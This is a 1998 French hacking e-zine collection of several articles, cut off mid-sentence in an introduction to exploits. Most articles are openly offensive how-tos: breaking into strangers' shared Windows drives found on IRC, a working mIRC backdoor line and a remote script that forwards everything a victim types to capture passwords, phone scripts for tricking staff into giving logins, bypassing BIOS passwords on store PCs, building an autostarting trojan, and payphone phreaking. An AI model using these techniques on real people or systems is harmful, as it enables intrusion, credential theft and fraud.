(par Sice et traduit par vaToO)

Ok, on ne peut pas parler d'exploit ici, il s'agit avant tout d'une mauvaise config sur la
machine sur laquelle vous allez vous connecter. Mais avant d'aller plus loin dans cette methode,
je tiens a remercier Ph@ntom, Utopiste, [mob], Smokey et Cyberjunk sans lesquels cet article
n'aurait pu se faire. Un petit mot sur l'exploit en lui-meme. Avec cet exploit vous aurez la
possibilite de vous connecter sur une machine qui fait tourner windows (3.11, 95, 98 ou encore
NT) ainsi que le client pour reseaux microsoft avec le partage de fichiers et d'imprimantes
active. Cela ne fonctionne donc pas avec toutes les machines. Pour vous entrainer afin de bien
comprendre la methode, je vous conseille #windows95 afin de trouver des "victimes", cependant
si vous souhaitez VRAIMENT en apprendre d'avantage sur cette technique n'oublier pas que vous
pouvez le faire en "loop-back" (127.0.0.1).

Maintenant, il faut tout d'abord vous assurer que vous avez sur votre bureau l'icone voisinage
reseaux (Network Neighborhood). Si ce n'est pas le cas, vous devez ajouter, dans le Panneau
de Configuration / Reseaux, le client pour reseaux microsoft. Des bruits courent racontant
que vous auriez besoin, pour cet exploit, du NetBEUI, ils n'ont absolument aucun fondements.
Si vous avez des problemes autres que ceux decrit plus loin dans ce fichier, considerer la
necessite de desinstaller puis reinstaller le client microsoft, le dialup et/ou le protocole
tcp/ip.

Bon maintenant choisir sa victime... comme je vous l'ai dit plus haut #windows95 est un bon
channel pour commencer. Vous pouvez egalement essayer sur des sites web. J'espere ne
surprendre personne en disant que pour connaitre l'ip de quelqu'un sur irc, il faut taper:
"/DNS nickname". Ouvrez une session Dos, la commande suivante va nous permettre de savoir si
la personne fait tourner le partage de fichiers:

;--- Session DOS ---

C:\WINDOWS>nbtstat -A addresse_ip

NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
USERNAME <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
USERNAME <03> UNIQUE Registered
USERNAME <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00

C:\WINDOWS>_

;------

Si la personne fait tourner le client microsoft avec le partage de fichiers/imprimantes active,
c'est ce que vous devriez voir. Sinon, un message d'erreur peut apparaitre: "Host not found.",
il y a deux causes principales a cette erreur. 1- la personne ne fait pas tourner le client
microsoft ou n'est, tout simplement pas sous windows, donc c'est normal. 2- quelqu'un sur
le reseau utilise le meme nom de machine que vous, changer le votre en un autre moins probable
(Panneau de Configuration / Reseaux / Identification).

Bon, imaginons que vous ayez du premier coup une reponse favorable de nbtstat,
ce qui nous interresse c'est le Remote <20>, c'est le service de partage de
fichiers, s'il n'y est pas, n'esperez pas pouvoir vous connecter sur la
machine. Pour la petite information, le MAC Address (Media Access Control),
c'est un chip sur les cartes ethernet qui delivre un numero d'identification
unique pour la carte (qui est egalement simule par le dial-up de windows,
c'est pour ca que la plupart des MAC address que vous verrez seront les memes
;)).

Bon, maintenant que vous connaissez le nom du remote 20, il faut que vous
l'ajoutiez au fichier lmhosts dans le repertoire de windows, si ce nom
contient des espace mettez-le simplement entre guillemets (""). Ce fichier
est utilise par la pile du client Wins (qui fait que le NetBios prime sur le
TCP/IP) et contient la redirection des addresses ip vers des nom
d'ordinateurs. Ce fichier est divise en plusieurs colones, la premiere c
ontient l'addresse ip, la seconde le nom de la machine hote et la troisieme
et les suivantes des directives et/ou des commentaires. Ce qui differencie le
passage d'une colone a une autre c'est au mimimum un espacement. Chaque
directives et chaque commentaires doit etre precede du signe #, mais ils ne
nous servent a rien pour le moment.

;--- Suite de la Session DOS ---

C:\WINDOWS>echo addresse_ip nom_du_remote_20>>c:\windows\lmhosts
C:\WINDOWS>_

;------

Ici, si vous n'aviez pas de fichier lmhosts existant, remplacez la
redirection par un simple ">" au lieu de ">>". Bon une fois le nouveau host
ajouter, il ne vous reste plus qu'a resetter le cache du netbios

;--- Suite de la Session DOS ---

C:\WINDOWS>nbtstat -R

Successful purge and preload of the NBT Remote Cache Name Table.
C:\WINDOWS>_

;------

Maintenant, il faut savoir quelles sont les ressources partagees sur la
machine hote, pour cela, on va se servir de la commande "net", dont le
parametre view permet (justement) de lister ces ressources.

;--- Suite de la Session DOS ---

C:\WINDOWS>net view \\nom_du_remote_20
Shared resources at \\USERNAME

Sharename Type Comment
-------------------------------------------
A Disk
C Disk
D Disk
HPDeskJet Printer
The command was completed successfully.

C:\WINDOWS>_

;------

Ok, si tout c'est bien passe, vous devriez avoir quelque chose de similaire.
Sinon voila toujours une petites liste des messages d'erreur les plus
courant, et comment en venir a bout.

Error 5: You do not currently have access to this file.
La machine partage des ressources mais vous devez entrer un password pour
avoir access. Pour cela il faut passer par windows (si qlq1 connait un autre
moyen, merci :)), cliquez sur demarer / rechercher / ordinateur (si vous
n'avez pas cette option allez downloader les powertoys sur le site de
microsoft). La remplissez le nom de l'ordinateur par \\nom_du_remote_20 et
cliquez rechercher. Une fois que la machine est trouvee, cliquez deux fois
dessus, vous pourrez alors entrer un password reseau (les premiers a essayer
sont le nom du remote 20, ou un password vide).

Error 53: The computer name specified in the network path cannot be located.
Ici il peut y avoir deux causes, soit vous avez mal introduit des donnees
precedement (dans lmhosts par exemple, ou encore dans la commande "net view"),
soit la machine que vous essayez d'atteindre n'est pas accesible (elle vient
de se faire deconnecter).

Error 59: An unexpected network error has occurred. (Disconnected)
Ici, l'erreur et due a un probleme lors de la transmission des donnees entre
vous et la machine PENDANT l'execution de la commande "net view".

Error 86: The specified network password is not correct.
Le password que vous venez d'entrer (via le dos), n'est pas valide.

Error 3787: You must log on before performing this operation. (Find)
Cette erreur reste un demi mystere, elle est due au fait que windows 95 pense,
lors de votre premiere tentative d'utiliser "net view" que vous n'est pas
loguer sur le reseaux. Pour ne plus avoir ce probleme durant la meme session
internet, cliquez sur demarer / rechercher / ordinateur (si vous n'avez pas
cette option allez downloader les powertoys sur le site de microsoft). La
remplissez le nom de l'ordinateur par \\nom_du_remote_20 et cliquez
rechercher. Une fois que la machine est trouvee, cliquez deux fois dessus,
vous pourrez alors relance la commande "net view" sans messages d'erreurs.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-= IRC: quelques trucs =-
(par Utopiste)
-= Introduction =-
Le RFC de IRC est un des RFC que je maitrise assez bien (je parle d'un point
de vu de programmation et de script) , alors vous trouverez toujours une
rubrique de IRC dans ce emag, si vous des questions, n'hesitez pas a me les
envoyer. Je vous donne seulement 4 truc dans cet article la, il sont un peu
newbie, mais pour le premier numero de FrHack je ne voulait pas rentrer trop
dans les details.

1.0 -= Comment transformer un DCC CHAT en telnet =-

Il a deja quelque temps, je chattais sur IRC avec mon telnet, lorsque un ami
decida de m'envoyer un DCC CHAT avec son MIRC. evidement son DCC n'a jamais
fonctionner, mais il m'a donner l'idee d'utiliser le systeme de DCC de mirc
pour le modifier en telnet

la ligne de commande est la suivante (a taper dans mirc)

//Quote privmsg nick :DCC CHAT CHAT $longip(xxx.xxx.xxx.xxx) port
ou encore
//Quote privmsg nick : $+ $chr(1) $+ $longip(xxx.xxx.xxx.xxx) port

explication:
nick = la personne qui va recevoir le DCC ou la session,
 = le caractere ascii 1,
$longip = une fonction prefini de MIRC qui tranforme une IP de format
xxx.xxx.xxx.xxx sous un format de ip longue,
xxx.xxx.xxx.xxx = l'ip ou vous desirez vous connecter et finallement,
port = le port sur lequel vous desirez vous connecter.

donc :
//Quote privmsg $me :DCC CHAT CHAT $longip(206.231.198.66) 25

vous ferai une session DCC CHAT qui serait connecter sur le deamon mail du
serveur www.collanaud.qc.ca

Une petite note interessante: il est simple de detourner un DCC CHAT en
programmant une remote simple

ctcp 1:DCC CHAT: {
//Quote privmsg %nick : $+ $chr(1) $+ $$1-
}

ce petit remote, fera que lorsque vous receverez une demande de DCC CHAT,
elle sera automatiquement envoyer a %nick et c'Est elle qui fera le DCC CHAT,
la personne qui a demander le DCC CHAT ne verra aucune difference et croira
qu'elle parle a vous alors qu'en realite elle parlera a l'autre ;)
la personne qui devait en temps normal recevoir le dcc va seulement voir que son DCC
chat ne marche pas :)

2.0 -= Une petite back door dans le remote =-

le remote est un petit interpreteur de commande qui permet de reconnaitre des
evenement et de creer plus ou moins des macro a l'interieur de MIRC. Voici
une petite back door mirc qui permet de controler entierement un autre mirc
en lui transmettant des commandes

; installer cet instruction dans l'ordi que vous desirez controler
CTCP 1:REMOTE: /$$2-

cet ligne une fois installer vous permettra de pouvoir executer n'importe
quel commande sur le MIRC ou elle est implante vous n'avez seulement qu'a
faire

/ctcp <nick> REMOTE <action>

donc par exemple vous pourrez faire:

/ctcp Un_Con REMOTE op Votre_Nick
(ce qui va oper l'utilisateur Votre_Nick sur le channel ou les gars est op)

ou encore mieu:
/ctcp Un_op REMOTE msg X ADDUSER #channel_du_op Votre_nick *!*@* 100 PassWord
(ce qui va vous donner un access sur le bot X du gars si il a un access)

Bon je suis sur que d'un coup la back door installer vous aurez plein d'
idee ;) le problème de cet back door est que si l'utilisateur va voir dans
son status il vera les [votre_nick REMOTE] /.......
pour eviter ceci vous mettra la couleur de ses CTCP la meme couleur que son
fond). Il existe un script legerement plus long, mais ca iras pour le
prochain article de irc.

3.0 Comment faire planter IRC

Un petit buffer overflow dans MIRC (ce qui provoque trois fatal error de
suite) j'ai encore trouver aucune utilite autres que de l'envoyer par remote
(le truc en haut) (Le quit sera celui d'un read error)

//echo $str(X,333333333) $+ $str(X,333333333)

Je suis sur que ce renseignement est inutiles mais ca peut toujours etre
sympa a inclure dans un script (Si vous trouver une utilite quelconque,
n'hesitez pas en m'en faire part)

4.0 Comment sniffer une conversation sur MIRC

Bon le dernier petit truc pour cet article, comment sniffer une conversation
MIRC, la encore il faut installer un petit script sur l'ordi du gars
(mais ce n'est pas toujours un gros probleme). Avant de dire comment faire,
n'oublier pas que notre vie publique est deja assez menacer, alors vous etes
pas obliger de lire en details les conversations des autres utilisateurs,
contentez vous seulement des /msg x@channels.undernet.org LOGIN #CHANNEL
MotDePasse (ce qui est suffisant pour faire un TO) mais bon vous pouvez
souvent chopper d'autre mot de passe ou des infos interessantes autres que
ASV et les mensuration de la fille.

; parti a inclure dans le remote du gars
on 1:INPUT:*: /msg Votre_nick $$1

cet fonction enverra a Un_Nick tout les phrases ou les commandes taper
dans n'importe quel fenetre de MIRC

-= Conclusion =-

J'espere que mon article va vous etes d'une quelconque utilite, si vous avez
des questions n'hesitez pas a me les envoyiez, je tacherai de repondre a ses
email a l'interieur de cet chronique.

-= A venir =-
dans le prochain mag: une autre backdoor, la programmation des socket avec
MIRC, comment se connecter a IRC via un programme de telnet.

-= Utopiste =-
(utopiste@hotmail.com)


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-
* Le social Engeenering *
(Brain Override)

Le social enginnering:
Cette méthode, pas trés employ‚e en France, est pourtant de loin celle permet d'infiltrer le plus de systŠmes
(et en particulier de gros systèmes).. En effet il permet d'exploiter la faille la plus grosse de toute entreprise ou systŠme
informatique : LE PERSONNEL !
Le social Engeenering est plus simplement l'art d'usurper l'identit‚ d'autrui, l'action de se faire passer pour une personne que
l'on est pas (Je r‚pŠte pour ceux qui seraient longs … la d‚tente;) afin d'obtenir des informations confidentielles
(sinon ca sert a rien ..on demande une brochure publicitaire...).
Alors d'abord il y a deux m‚thodes :
Soit on connait d‚ja pas mal de trucs sur la boite...
Soit on connais strictement rien tou trŠs peu et on veut en apprendre d'avantage.

Bon essayer d'abord de suivre ces quelques rŠgles de base:

Si vous avez d‚ja fait des jeux de r“les ca peut beacoup vous aider (improvisation, facilit‚ d'adaptation du language)
Pr‚parez une feuille que vous garderez sous les yeux afin de rester coh‚rent qui mensionne pr‚cis‚ment qui
vous ˆtes, votre soci‚t‚ (fictive ou pas), et ou vous pr‚parez le sc‚nario de votre conversation en essayant de pr‚voir les
‚ventuelles questions que votre interlocuteur vous posera, ainsi que les r‚ponses que vous devrez lui fournir..
Bon c'est pas grand chose mais ca aide beaucoup :)
Essayer aussi de pr‚voir du bruit d'ambiance du style salle informatique, standard, bureau d'‚tude etc... et
quelques petites musiques que vous balancerez directement … travers votre t‚l‚phone (musiques d'attente etc...)
DerniŠre chose la base du social engeenering est que :
Quand vous utilisez des phrases assez concises en employant un vocabulaire trŠs technique (les acronymes ca aide..et si je
retrouve mon fichier d'Acro je vous l'envoie), La personne … l'autre bout du fil va trŠs vite se trouver en situation d'inf‚riorit‚,
et donc aura tendance … accepter comme vrai ce que vous lui dite ! (Bases de psycho).. Il existe aussi une autre variante
qui s'appelle le reverse E. J'en reparlerais tout … l'heure.

Commen‡ons par... Le second cas (La logique est une vertue du hacker :)).
Le mieux dans ce cas est de se faire passer pour des personnages du genre :
Un acheteur potentiel
Un sondage ou une enquˆte statistique
Un magazine
Radio ..… la limite..

Dans ces cas l… votre but sera d'obtenir assez d'informations sur l'entreprise afin de passer … la premiŠre m‚thode.
Un exemple typique :
S. Soci‚t‚ Datronic, bonjour, GisŠle Dubois.
V. Boujour, Jos‚e Lespare de Pc-Expert. Je suis charg‚ d'une enquˆte visant a l'‚valuation du parc informatique
francais et de son ‚quipement logiciel pour le Laboratoire Ziff-Davis France.
S. Heu..Oui je vais voir si...
V. J'aimerai vous posez quelques questions du type "Les architectures install‚s" ou bien les "Os Utilis‚" Vous
pouvez m'aidez ?
S. Attendez un instant je vais voir si je peux vous passer le Service informatique.
V. Je Je vous remercie vous ˆtes charmante
S. De rien je vous en prie (Enfin quelqu'un qui lui a dit dans l'ann‚e)
Voil… je vous passe Olivier Dotrini, du service informatique.
V. Je vous remercie encore, bonne journ‚e.
S. Olivier Dotrini, bonjour
V. Boujour, Jos‚e Lespare de Pc-Expert. Je suis charg‚ d'une enquˆte visant a l'‚valuation du parc informatique
francais et de son ‚quipement logiciel pour le Laboratoire Ziff-Davis France.
S. Oui que puis je faire pour vous ?
V. Eh bien nous essayons d'‚valuer la r‚partion des OS et des diff‚rents mat‚riels dans les entreprises francaises.
C'est pour ca que j'aimerai vous posez quelques questions.
Pouvez vous me dire le type de machines install‚s dans l'entreprise ansi que les diff‚rents type de systŠmes d'exploitation utis‚s ?
S. (Passons sur la r‚ponse ou notre ami nous d‚crit en quelques mots plus ou moins long ca varie du tout ou rien le parc
informatique contenant X serveurs etc..etc...)
V. Et bien je vous remercie vivement d'avoir r‚pondu … mes questions?
Pouvez vous ‚ventuellement me dire si et quand je pourrai vous recontacter pour de plus amples informations ?
S. Oui aucun problŠme Je suis la le Lundi le mardi et le jeudi. sinon vous pouvez demander Fabrice Boudier qui
sera en mesure de vous renseigner.
V. Et bien merci beaucoup et peut ˆtre a bientot.
Au revoir.

Voila qui nous aura permis de d'abord connaitre du personel de l'entreprise ainsi qu'un peu mieux le systŠme que l'on souhaite
attaquer ! :)) Vous pouvez aussi d'abord envoyer un mail en usurpant une identit‚ qui annoncera votre appel ainsi que le
motif, ca ne donnera que plus de cr‚dit Maintenant il faut passer … la suite.

Ben la suite, c'est trŠs simple :)))
Vous allez tout simplement appeller quand Mr Dotrini n'est pas la et carr‚ment demander a parler a Mr Boudier ;))
Et la libre … votre imagination :
vous faire passer pour un ami ou un contact important de Mr Dotrini :
Mr Dotrini m'a dit que..
Olivier m'a demander de etc...
Facile non ?
AprŠs libre a vous d'improviser !
Ce texte extrait et revu du CHG (Cyber Hack Guide par Brain Override) comporte normalement une trŠs vaste
bibliothŠque d'exemples et d'identit‚s d‚taill‚s), mais j'ai choisit de ne mettre ici que le plus important, le fond. La forme
est affaire d'improvisation Et si vous avez l'ƒme d'un hacker, vous trouverez tout seul la suite...Il existe une l‚gŠre variante
du social E. il s'agit de Reverse E. Le principe est pratiquement le mˆme, sauf que l… on se place (croit-il ;)) en situation
d'inf‚riorit‚ :
Du style :
Salut c'est Herv‚ le stagiaire du niveau 2, Je vous appelle parce que j'ai un problŠme.. Vous vous y connaissez en informatique ?
- A coup sur la personne sera fiŠre de montrer son immense savoir ainsi que... sa b‚tise !
Continuez ainsi :
Alors voil…, Quand j'allume l'ordinateur, il me demande un login (prononcer LOGAIN, comme ca vous aurez vraiment
l'air stupide, vous ‚pellerez le mot si n‚cessaire..)
Alors je tape le mot qu'on m'a donn‚ ROSS
Puis aprŠs il me demande un password et la je tape l'autre mot qu'on m'a donn‚ HERV01, et puis ‡a marche pas...etc..etc...

Eh bien 6 fois sur 10 Ce cancrelas vous balancera son login + mot de passe tout en se vantant de ses comp‚tences en informatique...
N'oubliez pas de le remercier d'un air stupide...Merci je ne sais pas ce que j'aurai fait sans vous..
N'h‚sitez pas … utiliser un truqueur de voix pour vous faire passer pour une femme....tous les coups sont permis..
Bon voil… un bon d‚but pour vous lancer dans le S.E. je suis sur que vous d‚velopperez rapidement vos propres techniques...
A Bient“t sur le net.

Brain Override
Brain_override@yahoo.com
ICQ 8951363


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-==-=-

Bon, on va prendre une petite pause, et lire un petit texte écrit par vaToO

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-==-=-

"Le monde des Zels" est un monde decale remplit de personnes (les zeliens)ayant
comme seule occupation de passer de bons moments sans se prendre la
tete,sans se preoccuper des innombrables conneries de la vie. Ce texte leur est
dedie.

L'INTELLIGENCE A LA PORTEE DU CON (ne concerne que le con)
90% des gens sont cons, vous avez donc vos chances.Gardez-les mais ne les
ruinez pas. Etre con est salutaire.Avoir l'air con est rhedibitoire.Soyez assez
intelligents pour saisir la nuance.

Premier exercice . Comment ne plus avoir l'air con.
a) Le con parle pour ne rien dire. Ne dites rien.Vous ne direz rien
d'intelligent, mais ca vous empechera de dire des conneries.Vous y gagnerez. Au lieu de
dire: "Quel con !", votre interlocuteur se dira:"Joue-t-il au con?"C'est un premier
point.
b) Si vous avez vraiment envie de parler,ne vous retenez pas.Dites vos
conneries, et concluez:"Bon,j'arrete de deconner".Votre interlocuteur se dira:"II joue au
con"
. C'est un deuxieme point.

Deuxieme exercice: comment avoir l' air intelligent.
Vous avez a votre disposition une serie de mimiques qui donnent inevitablement
l'air intelligent. Soyez assez cons pour les copier sans complexes.

a) L'air detendu: reperez la personne intelligente. Si vous etes dans un
groupe de dix, il y a neuf cons, dont vous. La personne intelligente c'est celle qui
semble
bizarre. Des qu'elle dit quelque chose de bizarre, faites comme si vous
compreniez. Meme Si vous ne comprenez rien, les autres auront l'air plus con que
vous.
b) L'air penetrant:pensez tres fort aux contraventions, aux impots, a votre
bagnole emboutie. N'en parlez surtout pas ca ferait con.Mais pensez-y.Si vous etes
vraiment tres con, ca ne vous donnera pas l 'air intelligent. Mais l 'air
emmerde fait toujours bien quand on ne donne pas ses raisons.
c) L'air penetre: meme exercice que le precedent mais avec un compas dans
le cul. Avantage: donne une dimension souffreteuse.

Vous avez aussi a votre disposition une serie d'attitudes.
a) Le penseur de Rodin: asseyez-vous. Mettez votre poing ferme sous votre
menton et regardez dans le vide.C'est radical.Meme si vous ne pensez a rien(ce qui est
normal pour un con), il se trouvera toujours un aute con pour vous dire"A quoi
penses-tu?"

b) L'air du type qui n'en pense pas moins: on developpe devant vous une
theorie saisissante. Vous n'y comprenez rien. Reportez-vous au petit a): l'air
detendu. Pour corser, ayez l'air non seulement de comprendre, mais aussi d'avoir
votre idee pas con la-dessus. Appliquez le petit b): l'air penetrant.
c) Le rictus de connivence: hochez un peu la tete de bas en haut. Appliquez
l'air penetre (le compas vous aide a crisper finement les maxillaires).

Mefiez-vous des revelateurs involontaires de votre connerie !
a) Surveillez votre regard. Votre oeil vide et sans vie vous trahit.Par
definition, vous etes trop con pour avoir la pupille petillante. Ne vous laissez pas
abattre. Gardez l' oeil fixe.
b) Fermez bien votre bouche. Rien ne fait plus con qu'une bouche
entrouverte.Maitrisez-vous: ne machez plus de chewing gum. Si vous etes trop con pour
executer en meme temps les exercices oeil fixe-bouche close, utilisez le truc de la
clope: tirez sur votre megot et fixez la fumee.

Troisieme exercice: Comment passer pour quelqu'un d'intelligent:
a) Ne perdez pas votre temps a lire des livres intelligent et a voir des
films penses..vous n'y comprendrez rien et ca vous deprimerait.Lisez plutot des
critiques intelligentes. Apprenez-les par coeur et changez quelques mots. Exemple: "Ce
film a la beaute desertique d'une douleur sans fin "
devient " Ce film a la
beaute squelettique d'une couleur sans teint"
. Vous ne plagiez pas vraiment et vous
gagnez en hermetisme. L'hermetisme est le secret de ce troisieme exercice.
Quand vous dites des conneries, dites des connenes incomprehensibles. Les
cons les prendront pour des finesses qu'ils ne comprennent pas et, double
avantage, les gens intelligents se sentiront cons.
b) Ne faites jamais de citations. Ca fait tres con. Appropriez-vous les
carrement. Mais attention, ne faites pas le con ! N'utilisez pas des citations trop
connues. Si un autre con vous dit: "C'est de toi ca? ", ne prenez pas l'air confus.Ne
doutez pas de vous. Votre connerie native vous y aidera.

Voila maintenant vous passez a peu de frais pour quelqu'un d'
intelligent. Mefiez-vous!Des gens intelligents vont venir vous poser des questions
intelligentes. Vous etes trop con pour y repondre. Comment faire ? Renvoyez la balle:
"Pourquoi me poses-tu cette question ? ". Quand vous ne pouvez plus la renvoyer,
affrontez l'adversaire. Utilisez les quelques celebres formules qui repondront pour
vous; par ordre chronologique:
-Tu vois ce que je veux dire... (la formule qui sauve)
-Il me semble que tu limites le probleme... (l'autre a l'air con)
-Tu crois vraiment ce que tu dis ? (l'autre a l'air hypocrite)
-C'est tout ce que tu trouves a dire, ben merde ! (l'autre a l'air limite)
-Tais-toi tu m'atterres (l'autre a l'air tres con).
S'il se tait, vous avez gagne.
Ultime traquenard: la tentation de l'intelligence veritable. Attention!Ne
tombez pas dans ce panneau demoniaque ! Les gens intelligents sont malheureux. Ils ont
compris qu'on etait la pour vieillir et crever. Avant, il n'y a rien, apres non
plus, et pendant, on en chie.Comprendre, c'est perdre les avantages du con.C'est
connaitre le doute, la solitude, la marginalite odieuse, l'insomnie, l'angoisse, les
battements de coeur, la souffrance. Et tout ca pour rien puisque vous serez toujours
un con. Surtout, ne changez pas. Soyez assez intelligents pour rester cons.
Et longue vie.

_______
\(EOF)/
___ ___ øøøøø
)(() )( )
( )() ( ))( le savoir mene a la
) ((_)) ( ) liberte
)_) ( (
(_( )(
)_) _ ) ___ ____ ___ ___
(__)( ) ( ) ( _ ) (____) ( ) ( )
(__) \(_)/ )(-)( )( )O( )O(
)__( )_( (_) (_) (__) (___) (___)
(____) [ vatoo75@altern.org ]
o(____)o
øoøoøoø(Mai 1998)




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= Comment By-passer la protection du mot de passe d'un Bios sur un PC =-
Par {Viking}

La je vais parler du cas ou vous avez access a l'ordinateur, que vous pouvez vous cacher pour une petite decapitation en vitesse et ou vous
etes avant que l'ordi soit totalement ouvert (en train de booter, pis y vous fo un pass de BIOS). Compris? Les autres vous pouvez sacr‚ le
camp... Bom premierement, verifiez deux ou trois passwrd, au cas ou... Si ca marche pas, bin ouvrez la carcasse de l'ordi (Tournevis ou bar a
clou) pis vous chercher une petite patente (batterie) ronde sur le cote de la mother board ou ya le processeur. Enlevez ca, (pas le processeur,
la patente ronde!) pis garder ca ailleurs que sur l'ordi pendant 15-30 minutes... Ensuite, regarder pour le jumper du CMOS, mettez le a off. Ensuite
chercher une petite batterie blue avec un jumper colle dessus enlevez la pour 15-30 minutes aussi... Replacez le couvercle, pis allez dans le
setup du BIOS, voila, metter le setup que vous voulez. Si vous etes assez rapides (du genre po mal rapide) vous allez pouvoir craquer des
ti-Pc dans le magazins... Pi si le gars du rayon informatique vient vous voir bin, inventez une histoire. mweheheh faites vous pas pogner, c dur
d'expliquer qu'est-ce qu'on fait avec un tournevis a quate patte dans une allee du Club Price en train de demonter un Pc. Bon, avec ca vous
devriez etre pas pire pour pogne des accounts internet gratos chez tout les merveilleux (merdeux) comptoirs de Aventure Electronique.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

LES TAUPES (ou cheval de troie)


I. kesk'une taupes ?

Une taupe est un programmes un peu partikulier,il faut ke ce soit la
personne ke vous comptez pirater ki le lance dans sa machine, pour cela un seul
moyen: le social engineering , il faut mettre le gars en confiance afin k'il
lance
le prog. apres l'avoir lancé se prog transformera sa machine en serveur ftp
accessible a tous!

II. Komman faire une taupe?

Il existe deja de nombreuse taupes (nukepatch, CES etc.), une taupe fait
ceci:

- elle transforme une machine en serveur FTP
- elle donne acces à un port
- elle se lance à chaque démarrage
- elle reste invisible

il est tres facile de faire une taupes en visual Basic (regardez aide->reseau),
ensuite vous la couplez avec un prog de ftp (NE PAS OUBLIER L'ACCES AU PORT).

Il suffit apres ça de creer un executable ki fera ceci:

-intaller la taupe
-fera kroire kelke chose a l'utilisateur (genre: uptdating reussi etc.)
-editera le fichier win.ini pour lancer le prog au demarrage
(load="nomduprog" /h).


III. et apres ?

Ben d'apres vous? voua avez plus qu'a entrer dans cette machine et ce kuand vous
le voulez !!!

BY -=[MAJSETIX]=- '98


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

//////=-||PHREAKING||-=\\\\\\
鎎ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¨
ü Par CyberRider de DSK CREW ü
·ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽë
\\\\\\\\\\\=========//////////


Ok Pour se premier tutorial je ne rentrai pas en detaille sur la construction
de box ( blue red silver etc...) bon pour ceux qui ne savent rien de ce qu'est
une box sa vient un peu plus loin dans l'article d ack bon commencon


First pour commencer le phreaking est totallement illegale a 100% il consiste
Crosser les compagni de telephone comme bell par example mais je ne croit pas
que kekun a deja ete arretter pour sa ou bin faut etre po habile. petit con-
seille pour les debutant ne faite jamais sonner des tone de 1$ 25 c et encor
moin le 2600 hz ce sont des tone retrassable par les compagni de telephone.


Ok pour vrai maintenant quesqu une box et des tone et hz c koi staffaire la
Bon les tone sont les son que utilise les telephone publique pour reconnaitre
le cash et les pitton tse les beep dans le telephone spo juste pour cute
quand vous caller vos pote au non c loin de laitre. Bon maintenant les tone
c'est des differente pussante de hz ( des home comme sa se pronnonce tout
Simplement ). Ok et maintetaNT C c koi une merde de BOX . ok c loin d etres de
la merde moi je dit hehehe. Les boxe son comme des tone generateur que le
monde se construise pour pour generer les tone souvant avec des vieux clavier
de telephone et des circuit electronique des led et des diod des chose comme
sa la mais dans se premier tutorial je ne vous montrer pas comment monter
une box. voici les different type de box

Blue box - genere les appele locaux (le cout dses appelle)
Purple box - Tous appele gratuite
Silver box - applle gratuit et bien d autre (certain dise que l arme sen sair)
Cheese box - Fait de votre appele une appele intracable

Bien d autre box exist comme la red box avec son spt spt2 2600 hz et autre
et encor d autre fait par des personne comme la jolly box bon mais je ne
rentre pas dans les detaille.

Ok maintenant vous savez tous se quai le phreak vous voulez biensur commencer
a phreaker domage se seras dans le prochin numero non stuen joke ok.
Bon sur koi on pourrai bien s attacker bon pour commencer fau se trouver les
outils moi je dit. Alors ou sen denicher vu qu on na po de box voici se
qu'il nous faut

- Mini enregistreuse
- un ordi avec carte son
- Un tone generateur facillement trouvable
- Une boite telephonique cacher des yeux des gens

Ok voici que sacheve se tutorial que le peu nommer d aproche au phreaking.
Apres vous etes denicher un tone generateur faites vous des petit montage
de styel a avoir les principal comme les tone de la blue box.
Et maintenant rendez vous a votre telephone publique et faite absolument
N importe koi vraiment n importe koi avec vos tone mais rester po la plus
de 2 min si vous faite nimporte koi car un operateur telephonique ne doit
etre fou quand i voie un telephoen qui envoi 6 fois 2600hz de suite hum po
normal hein pis en passant vu que vous avez pas apris de crosse encors vous
pouvez utiliser le 2600 hz pour le retour de la monnaie


ok maintenant je ne suis en aucun cas resp"nsable dde se que vous allez faire
je ne fait que montrer que tous est possible et non pratiquer sa a longeur de
journee..

Pour toutes question ou commentaire un petit mail sufi
http://dsk.home.ml.org ü

Article ecrit par: CyberRider un momment donne en 1998
Dans une place de fou!!!


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- = LES EXPLOITS =-
(par protek)

1) Introduction:
Beaucoup de personnes me demandent ce que sont les exploits, a quoi ils servent, et comment les utiliser. Voila, j'ecris ce
texte pour vous expliquer tout ca pour la derniere fois j'espere. Ca commencait a m'enerver, tout le monde sur IRC me posait
des questions, c'est pour ca que moi, |Pr0teK|, ecrivain paresseux, j'ai decider de bouger mon cul une fois encore! Voila tout
est la:

2) Qu'est ce qu'un "
exploit" ?
Bon je vais vous expliquer ca simplement, un exploit est un programme qui exploite un bogue dans des logiciels specifiques.
Tous ces exploits sont different, ils font des choses differentes et exploitent des bogues differents ,c'est pour ca que les
exploits sont toujours lies a des programmes differents. Les exploits sont fait pour gagner le "
root" sur les systemes
d'exploitations. Ils marchent quand le programme utilise le "
root". Sous les sytemes UNIX , les programmes utilisent
souvent le "
root" pour faire une tache specifique qui ne peux etre faite par un utilisateur normal. Bon les exploits crashent le
programmes jusqu'a ce qu'ils obtiennent le "
root" access.

3) Comment utiliser des exploits ?
99% des exploits sont codes en "
